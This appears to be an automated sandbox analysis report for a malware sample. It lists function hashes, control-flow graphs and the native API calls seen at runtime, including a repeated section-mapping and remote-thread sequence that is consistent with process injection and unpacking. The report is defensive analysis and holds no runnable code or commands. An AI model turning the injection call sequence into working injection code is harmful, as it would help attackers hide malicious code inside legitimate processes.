                                                            • API String ID: 0-2784972518
                                                            • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                            • Instruction ID: 15c01d043f095b694845539f3100e8714b0ec17e0aa8296a5cbcef3798d97c7c
                                                            • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                            • Instruction Fuzzy Hash: 983169B6920609DFEB20CF99C880BAEBBF5FF08724F14404AD441A7255D7B1EA45CBA4
                                                            Function 022FFC03 Relevance: .1, Instructions: 61COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2144344301.00000000022F9000.00000040.00000020.00020000.00000000.sdmp, Offset: 022F9000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_22f9000_cOm0MmeV34.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                            • Instruction ID: b295310bf1e4522af0583cd1ffbc1d6f88280b06732c22f27f6e04cf450a603f
                                                            • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                            • Instruction Fuzzy Hash: C211E5723502109FD740CF95DDC0FA6B3EAEB8C360B198065EE08CB745D675E802CB60
                                                            Function 02200D90 Relevance: .0, Instructions: 43COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2143851890.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 02200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2200000_cOm0MmeV34.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                            • Instruction ID: 79116f1dd3098a799a35b7d8152be304d2f9053c271d8bddc41131d592c9d5e9
                                                            • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                            • Instruction Fuzzy Hash: F601A7766206058FEF21CFA4C844FAA33F9EB86215F4544A5E906972C7E774AA418B90

                                                            Execution Graph

                                                            Execution Coverage:7.9%
                                                            Dynamic/Decrypted Code Coverage:40.7%
                                                            Signature Coverage:0%
                                                            Total number of Nodes:118
                                                            Total number of Limit Nodes:3
                                                            execution_graph 3664 402e63 3666 402e67 3664->3666 3665 401918 8 API calls 3667 402f44 3665->3667 3666->3665 3666->3667 3706 401543 3707 401546 3706->3707 3708 4015e6 NtDuplicateObject 3707->3708 3712 401702 3707->3712 3709 401603 NtCreateSection 3708->3709 3708->3712 3710 401683 NtCreateSection 3709->3710 3711 401629 NtMapViewOfSection 3709->3711 3710->3712 3714 4016af 3710->3714 3711->3710 3713 40164c NtMapViewOfSection 3711->3713 3713->3710 3717 40166a 3713->3717 3714->3712 3715 4016b9 NtMapViewOfSection 3714->3715 3715->3712 3716 4016e0 NtMapViewOfSection 3715->3716 3716->3712 3717->3710 3766 401924 3767 401929 3766->3767 3768 40195e Sleep 3767->3768 3769 401979 3768->3769 3770 401538 7 API calls 3769->3770 3771 40198a 3769->3771 3770->3771 3626 211e996 3627 211e9a5 3626->3627 3630 211f136 3627->3630 3631 211f151 3630->3631 3632 211f15a CreateToolhelp32Snapshot 3631->3632 3633 211f176 Module32First 3631->3633 3632->3631 3632->3633 3634 211f185 3633->3634 3635 211e9ae 3633->3635 3637 211edf5 3634->3637 3638 211ee20 3637->3638 3639 211ee31 VirtualAlloc 3638->3639 3640 211ee69 3638->3640 3639->3640 3640->3640 3660 402fe9 3661 403140 3660->3661 3662 403013 3660->3662 3662->3661 3663 4030ce RtlCreateUserThread NtTerminateProcess 3662->3663 3663->3661 3772 3cb0001 3773 3cb0005 3772->3773 3778 3cb092b GetPEB 3773->3778 3775 3cb0030 3780 3cb003c 3775->3780 3779 3cb0972 3778->3779 3779->3775 3781 3cb0049 3780->3781 3782 3cb0e0f 2 API calls 3781->3782 3783 3cb0223 3782->3783 3784 3cb0d90 GetPEB 3783->3784 3785 3cb0238 VirtualAlloc 3784->3785 3786 3cb0265 3785->3786 3787 3cb02ce VirtualProtect 3786->3787 3789 3cb030b 3787->3789 3788 3cb0439 VirtualFree 3791 3cb04be LoadLibraryA 3788->3791 3789->3788 3792 3cb08c7 3791->3792 3793 3cb0005 3794 3cb092b GetPEB 3793->3794 3795 3cb0030 3794->3795 3796 3cb003c 7 API calls 3795->3796 3797 3cb0038 3796->3797 3684 401496 3685 401447 3684->3685 3685->3684 3686 4015e6 NtDuplicateObject 3685->3686 3694 40152f 3685->3694 3687 401603 NtCreateSection 3686->3687 3686->3694 3688 401683 NtCreateSection 3687->3688 3689 401629 NtMapViewOfSection 3687->3689 3691 4016af 3688->3691 3688->3694 3689->3688 3690 40164c NtMapViewOfSection 3689->3690 3690->3688 3692 40166a 3690->3692 3693 4016b9 NtMapViewOfSection 3691->3693 3691->3694 3692->3688 3693->3694 3695 4016e0 NtMapViewOfSection 3693->3695 3695->3694 3604 402eb7 3606 402eb8 3604->3606 3605 402f44 3606->3605 3608 401918 3606->3608 3609 401929 3608->3609 3610 40195e Sleep 3609->3610 3611 401979 3610->3611 3613 40198a 3611->3613 3614 401538 3611->3614 3613->3605 3615 401539 3614->3615 3616 4015e6 NtDuplicateObject 3615->3616 3623 401702 3615->3623 3617 401603 NtCreateSection 3616->3617 3616->3623 3618 401683 NtCreateSection 3617->3618 3619 401629 NtMapViewOfSection 3617->3619 3621 4016af 3618->3621 3618->3623 3619->3618 3620 40164c NtMapViewOfSection 3619->3620 3620->3618 3622 40166a 3620->3622 3621->3623 3624 4016b9 NtMapViewOfSection 3621->3624 3622->3618 3623->3613 3624->3623 3625 4016e0 NtMapViewOfSection 3624->3625 3625->3623 3641 3cb003c 3642 3cb0049 3641->3642 3654 3cb0e0f SetErrorMode SetErrorMode 3642->3654 3647 3cb0265 3648 3cb02ce VirtualProtect 3647->3648 3650 3cb030b 3648->3650 3649 3cb0439 VirtualFree 3652 3cb04be LoadLibraryA 3649->3652 3650->3649 3653 3cb08c7 3652->3653 3655 3cb0223 3654->3655 3656 3cb0d90 3655->3656 3657 3cb0dad 3656->3657 3658 3cb0dbb GetPEB 3657->3658 3659 3cb0238 VirtualAlloc 3657->3659 3658->3659 3659->3647 3668 4014de 3669 401447 3668->3669 3670 4015e6 NtDuplicateObject 3669->3670 3677 40152f 3669->3677 3671 401603 NtCreateSection 3670->3671 3670->3677 3672 401683 NtCreateSection 3671->3672 3673 401629 NtMapViewOfSection 3671->3673 3675 4016af 3672->3675 3672->3677 3673->3672 3674 40164c NtMapViewOfSection 3673->3674 3674->3672 3676 40166a 3674->3676 3675->3677 3678 4016b9 NtMapViewOfSection 3675->3678 3676->3672 3678->3677 3679 4016e0 NtMapViewOfSection 3678->3679 3679->3677

                                                            Executed Functions

                                                            Function 00401496 Relevance: 10.7, APIs: 7, Instructions: 247nativeCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 85 401496-4014a5 86 4014a7 85->86 87 40151b-40152d 85->87 89 4014a9-4014b5 86->89 90 4014cf 86->90 95 4014ba 87->95 96 40152f-401535 87->96 92 401471-401472 89->92 93 4014b7-4014b8 89->93 94 4014d6 90->94 98 401473-401484 92->98 93->95 97 401449 93->97 94->94 99 4014d8 94->99 103 401447-401456 95->103 104 4014bc-4014c3 95->104 101 40147b-40148e call 4011b7 97->101 102 40144b 97->102 98->101 99->87 101->85 107 40144c-401470 102->107 103->107 108 4014c5-4014c8 104->108 109 401539-401567 104->109 107->98 108->90 119 401558-401563 109->119 120 40156a-401590 call 4011b7 109->120 119->120 127 401592 120->127 128 401595-40159a 120->128 127->128 130 4015a0-4015b1 128->130 131 4018b8-4018c0 128->131 135 4018b6-4018c5 130->135 136 4015b7-4015e0 130->136 131->128 139 4018da 135->139 140 4018cb-4018d6 135->140 136->135 145 4015e6-4015fd NtDuplicateObject 136->145 139->140 141 4018dd-401915 call 4011b7 139->141 140->141 145->135 147 401603-401627 NtCreateSection 145->147 148 401683-4016a9 NtCreateSection 147->148 149 401629-40164a NtMapViewOfSection 147->149 148->135 153 4016af-4016b3 148->153 149->148 151 40164c-401668 NtMapViewOfSection 149->151 151->148 154 40166a-401680 151->154 153->135 156 4016b9-4016da NtMapViewOfSection 153->156 154->148 156->135 158 4016e0-4016fc NtMapViewOfSection 156->158 158->135 161 401702 call 401707 158->161
                                                            APIs
                                                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2369873187.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_tcgcuca.jbxd
                                                            Similarity
                                                            • API ID: Section$CreateDuplicateObjectView
                                                            • String ID:
                                                            • API String ID: 1652636561-0
                                                            • Opcode ID: 5edb7204c22a8cfb94061bf161a88c3eca98da374ec15d8cd8ba2bf42dcd3747
                                                            • Instruction ID: 8e4940cc2d5d294876689a6a874cb0cc3c399929e81e9dec1e5d288c8cd9e9dd
                                                            • Opcode Fuzzy Hash: 5edb7204c22a8cfb94061bf161a88c3eca98da374ec15d8cd8ba2bf42dcd3747
                                                            • Instruction Fuzzy Hash: F481B375500244BBEB209F91CC44FAB7BB8FF85704F10412AF952BA2F1E7749901CB69
                                                            Function 00401538 Relevance: 10.7, APIs: 7, Instructions: 207nativeCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 163 401538-401567 169 401558-401563 163->169 170 40156a-401590 call 4011b7 163->170 169->170 177 401592 170->177 178 401595-40159a 170->178 177->178 180 4015a0-4015b1 178->180 181 4018b8-4018c0 178->181 185 4018b6-4018c5 180->185 186 4015b7-4015e0 180->186 181->178 189 4018da 185->189 190 4018cb-4018d6 185->190 186->185 195 4015e6-4015fd NtDuplicateObject 186->195 189->190 191 4018dd-401915 call 4011b7 189->191 190->191 195->185 197 401603-401627 NtCreateSection 195->197 198 401683-4016a9 NtCreateSection 197->198 199 401629-40164a NtMapViewOfSection 197->199 198->185 203 4016af-4016b3 198->203 199->198 201 40164c-401668 NtMapViewOfSection 199->201 201->198 204 40166a-401680 201->204 203->185 206 4016b9-4016da NtMapViewOfSection 203->206 204->198 206->185 208 4016e0-4016fc NtMapViewOfSection 206->208 208->185 211 401702 call 401707 208->211
                                                            APIs
                                                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401663
                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016A4
                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016D5
                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016F7
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2369873187.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_tcgcuca.jbxd
                                                            Similarity
                                                            • API ID: Section$View$Create$DuplicateObject
                                                            • String ID:
                                                            • API String ID: 1546783058-0
                                                            • Opcode ID: 4af5c640631db37ac51d1c1afd1ab74928840835cbc445bb96c3204467379d38
                                                            • Instruction ID: 71a4d0092025beca94809e07d65936591d52f1bb8effc294688e3fcd05e54c36
                                                            • Opcode Fuzzy Hash: 4af5c640631db37ac51d1c1afd1ab74928840835cbc445bb96c3204467379d38
                                                            • Instruction Fuzzy Hash: E0615171900204FBEB209F95CC89FAF7BB8FF85700F10412AF912BA2E5D6759905DB65
                                                            Function 004014DE Relevance: 10.7, APIs: 7, Instructions: 204nativeCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 213 4014de-4014ed 214 401563 213->214 215 4014ef 213->215 218 40156a-401590 call 4011b7 214->218 216 401551-401552 215->216 217 4014f1-401502 215->217 216->214 219 401504-401516 217->219 220 40151d-40152d 217->220 235 401592 218->235 236 401595-40159a 218->236 222 40151b-40151c 219->222 225 4014ba 220->225 226 40152f-401535 220->226 222->220 229 401447-401456 225->229 230 4014bc-4014c3 225->230 238 40144c-401470 229->238 233 4014c5-4014c8 230->233 234 401539-401567 230->234 239 4014cf 233->239 234->218 251 401558-401560 234->251 235->236 247 4015a0-4015b1 236->247 248 4018b8-4018c0 236->248 252 401473-401484 238->252 242 4014d6 239->242 242->242 246 4014d8 242->246 246->222 259 4018b6-4018c5 247->259 260 4015b7-4015e0 247->260 248->236 251->214 256 40147b-4014a5 call 4011b7 252->256 256->222 269 4014a7 256->269 265 4018da 259->265 266 4018cb-4018d6 259->266 260->259 274 4015e6-4015fd NtDuplicateObject 260->274 265->266 268 4018dd-401915 call 4011b7 265->268 266->268 269->239 273 4014a9-4014b5 269->273 277 401471-401472 273->277 278 4014b7-4014b8 273->278 274->259 276 401603-401627 NtCreateSection 274->276 279 401683-4016a9 NtCreateSection 276->279 280 401629-40164a NtMapViewOfSection 276->280 277->252 278->225 282 401449 278->282 279->259 285 4016af-4016b3 279->285 280->279 283 40164c-401668 NtMapViewOfSection 280->283 282->256 286 40144b 282->286 283->279 287 40166a-401680 283->287 285->259 289 4016b9-4016da NtMapViewOfSection 285->289 286->238 287->279 289->259 291 4016e0-4016fc NtMapViewOfSection 289->291 291->259 294 401702 call 401707 291->294
                                                            APIs
                                                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2369873187.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_tcgcuca.jbxd
                                                            Similarity
                                                            • API ID: Section$CreateDuplicateObjectView
                                                            • String ID:
                                                            • API String ID: 1652636561-0
                                                            • Opcode ID: c3f6308678fe624b1287adcb7156a2cf5c07ee8b7810a15753646c5694e98bc6
                                                            • Instruction ID: 6a824664258ffec6fdf95c516407446232c8a84219ad61b9fd4b8efeb52f3576
                                                            • Opcode Fuzzy Hash: c3f6308678fe624b1287adcb7156a2cf5c07ee8b7810a15753646c5694e98bc6
                                                            • Instruction Fuzzy Hash: 9B615C75900245BFEB219F91CC88FEBBBB8FF85710F10016AF951BA2A5E7749901CB24
                                                            Function 00401543 Relevance: 10.7, APIs: 7, Instructions: 173nativeCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 296 401543-401544 297 401546-401567 296->297 298 4015af-4015b1 296->298 304 401558-401563 297->304 305 40156a-401590 call 4011b7 297->305 300 4018b6-4018c5 298->300 301 4015b7-4015e0 298->301 307 4018da 300->307 308 4018cb-4018d6 300->308 301->300 317 4015e6-4015fd NtDuplicateObject 301->317 304->305 325 401592 305->325 326 401595-40159a 305->326 307->308 311 4018dd-401915 call 4011b7 307->311 308->311 317->300 320 401603-401627 NtCreateSection 317->320 322 401683-4016a9 NtCreateSection 320->322 323 401629-40164a NtMapViewOfSection 320->323 322->300 329 4016af-4016b3 322->329 323->322 327 40164c-401668 NtMapViewOfSection 323->327 325->326 338 4015a0-4015ad 326->338 339 4018b8-4018c0 326->339 327->322 330 40166a-401680 327->330 329->300 332 4016b9-4016da NtMapViewOfSection 329->332 330->322 332->300 335 4016e0-4016fc NtMapViewOfSection 332->335 335->300 340 401702 call 401707 335->340 338->298 339->326
                                                            APIs
                                                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401663
                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016A4
                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016D5
                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016F7
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2369873187.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_tcgcuca.jbxd
                                                            Similarity
                                                            • API ID: Section$View$Create$DuplicateObject
                                                            • String ID:
                                                            • API String ID: 1546783058-0
                                                            • Opcode ID: f4faf4f0efc4cc5c307795d20c298965336779ff7452863f8b2b81be2522acaa
                                                            • Instruction ID: 1fc6fb52bb36dddf8f971a96ecfe927bdbae9887f6286775c14151e9c1d92244
                                                            • Opcode Fuzzy Hash: f4faf4f0efc4cc5c307795d20c298965336779ff7452863f8b2b81be2522acaa
                                                            • Instruction Fuzzy Hash: 13512B71900245BBEB209F91CC88FAF7BB8EF85B00F14416AF912BA2E5D6749945CB64
                                                            Function 00401565 Relevance: 10.7, APIs: 7, Instructions: 165nativeCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 344 401565-401590 call 4011b7 349 401592 344->349 350 401595-40159a 344->350 349->350 352 4015a0-4015b1 350->352 353 4018b8-4018c0 350->353 357 4018b6-4018c5 352->357 358 4015b7-4015e0 352->358 353->350 361 4018da 357->361 362 4018cb-4018d6 357->362 358->357 367 4015e6-4015fd NtDuplicateObject 358->367 361->362 363 4018dd-401915 call 4011b7 361->363 362->363 367->357 369 401603-401627 NtCreateSection 367->369 370 401683-4016a9 NtCreateSection 369->370 371 401629-40164a NtMapViewOfSection 369->371 370->357 375 4016af-4016b3 370->375 371->370 373 40164c-401668 NtMapViewOfSection 371->373 373->370 376 40166a-401680 373->376 375->357 378 4016b9-4016da NtMapViewOfSection 375->378 376->370 378->357 380 4016e0-4016fc NtMapViewOfSection 378->380 380->357 383 401702 call 401707 380->383
                                                            APIs
                                                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401663
                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016A4
                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016D5
                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016F7
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2369873187.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_tcgcuca.jbxd
                                                            Similarity
                                                            • API ID: Section$View$Create$DuplicateObject
                                                            • String ID:
                                                            • API String ID: 1546783058-0
                                                            • Opcode ID: 40d7219ce39e026dd98d18ec02294656054e4da488103e740ba1602fb3a5db7c
                                                            • Instruction ID: d88667ffe02cbbb2798d41d5ad0cf6527765788d972b82ac88077c7d238bff09
                                                            • Opcode Fuzzy Hash: 40d7219ce39e026dd98d18ec02294656054e4da488103e740ba1602fb3a5db7c
                                                            • Instruction Fuzzy Hash: 54511A71900205BFEF209F91CC89FAFBBB8FF85B10F104259F911AA2A5D7759941CB64
                                                            Function 00401579 Relevance: 10.7, APIs: 7, Instructions: 163nativeCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 385 401579-401590 call 4011b7 391 401592 385->391 392 401595-40159a 385->392 391->392 394 4015a0-4015b1 392->394 395 4018b8-4018c0 392->395 399 4018b6-4018c5 394->399 400 4015b7-4015e0 394->400 395->392 403 4018da 399->403 404 4018cb-4018d6 399->404 400->399 409 4015e6-4015fd NtDuplicateObject 400->409 403->404 405 4018dd-401915 call 4011b7 403->405 404->405 409->399 411 401603-401627 NtCreateSection 409->411 412 401683-4016a9 NtCreateSection 411->412 413 401629-40164a NtMapViewOfSection 411->413 412->399 417 4016af-4016b3 412->417 413->412 415 40164c-401668 NtMapViewOfSection 413->415 415->412 418 40166a-401680 415->418 417->399 420 4016b9-4016da NtMapViewOfSection 417->420 418->412 420->399 422 4016e0-4016fc NtMapViewOfSection 420->422 422->399 425 401702 call 401707 422->425
                                                            APIs
                                                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401663
                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016A4
                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016D5
                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016F7
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2369873187.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_tcgcuca.jbxd
                                                            Similarity
                                                            • API ID: Section$View$Create$DuplicateObject
                                                            • String ID:
                                                            • API String ID: 1546783058-0
                                                            • Opcode ID: 44bf211d5ecd49b3cfb3996dc98baa0f9fc545abe5e070ef87effc0df1f686f8
                                                            • Instruction ID: 7169477154cf1621f4f222e223ad54e678f31395e99d0ffd613e12cb64d905d3
                                                            • Opcode Fuzzy Hash: 44bf211d5ecd49b3cfb3996dc98baa0f9fc545abe5e070ef87effc0df1f686f8
                                                            • Instruction Fuzzy Hash: 2B511A75900245BBEF209F91CC88FEF7BB8FF85B10F104119F911BA2A5D6759941CB64
                                                            Function 0040157C Relevance: 10.7, APIs: 7, Instructions: 160nativeCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 427 40157c-401590 call 4011b7 431 401592 427->431 432 401595-40159a 427->432 431->432 434 4015a0-4015b1 432->434 435 4018b8-4018c0 432->435 439 4018b6-4018c5 434->439 440 4015b7-4015e0 434->440 435->432 443 4018da 439->443 444 4018cb-4018d6 439->444 440->439 449 4015e6-4015fd NtDuplicateObject 440->449 443->444 445 4018dd-401915 call 4011b7 443->445 444->445 449->439 451 401603-401627 NtCreateSection 449->451 452 401683-4016a9 NtCreateSection 451->452 453 401629-40164a NtMapViewOfSection 451->453 452->439 457 4016af-4016b3 452->457 453->452 455 40164c-401668 NtMapViewOfSection 453->455 455->452 458 40166a-401680 455->458 457->439 460 4016b9-4016da NtMapViewOfSection 457->460 458->452 460->439 462 4016e0-4016fc NtMapViewOfSection 460->462 462->439 465 401702 call 401707 462->465
                                                            APIs
                                                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401663
                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016A4
                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016D5
                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016F7
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2369873187.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_tcgcuca.jbxd
                                                            Similarity
                                                            • API ID: Section$View$Create$DuplicateObject
                                                            • String ID:
                                                            • API String ID: 1546783058-0
                                                            • Opcode ID: c4110b1088d5ef41785dfe7ea8eaa09ab46741a105747cbb29c974859abd6495
                                                            • Instruction ID: 14f4b29c405daff92d21e2b3eea283823ae405efc36948ac0d92101f557811aa
                                                            • Opcode Fuzzy Hash: c4110b1088d5ef41785dfe7ea8eaa09ab46741a105747cbb29c974859abd6495
                                                            • Instruction Fuzzy Hash: DE51F9B5900245BBEF209F91CC88FEFBBB8FF85B10F104259F911AA2A5D6709944CB64
                                                            Function 00402FE9 Relevance: 3.2, APIs: 2, Instructions: 168nativethreadCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 467 402fe9-40300d 468 403140-403145 467->468 469 403013-40302b 467->469 469->468 470 403031-403042 469->470 471 403044-40304d 470->471 472 403052-403060 471->472 472->472 473 403062-403069 472->473 474 40308b-403092 473->474 475 40306b-40308a 473->475 476 4030b4-4030b7 474->476 477 403094-4030b3 474->477 475->474 478 4030c0 476->478 479 4030b9-4030bc 476->479 477->476 478->471 481 4030c2-4030c7 478->481 479->478 480 4030be 479->480 480->481 481->468 482 4030c9-4030cc 481->482 482->468 483 4030ce-40313d RtlCreateUserThread NtTerminateProcess 482->483 483->468
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2369873187.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_tcgcuca.jbxd
                                                            Similarity
                                                            • API ID: CreateProcessTerminateThreadUser
                                                            • String ID:
                                                            • API String ID: 1921587553-0
                                                            • Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                            • Instruction ID: 3e1675bac70c022a4e457ffe6b5fa54937b73e0116388ba90aec32851b4d9964
                                                            • Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                            • Instruction Fuzzy Hash: A1412431228E088FD768EF5CA885762B7D5F798311F6643AAE809D7389EA34DC1183C5
                                                            Function 03CB003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515memoryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
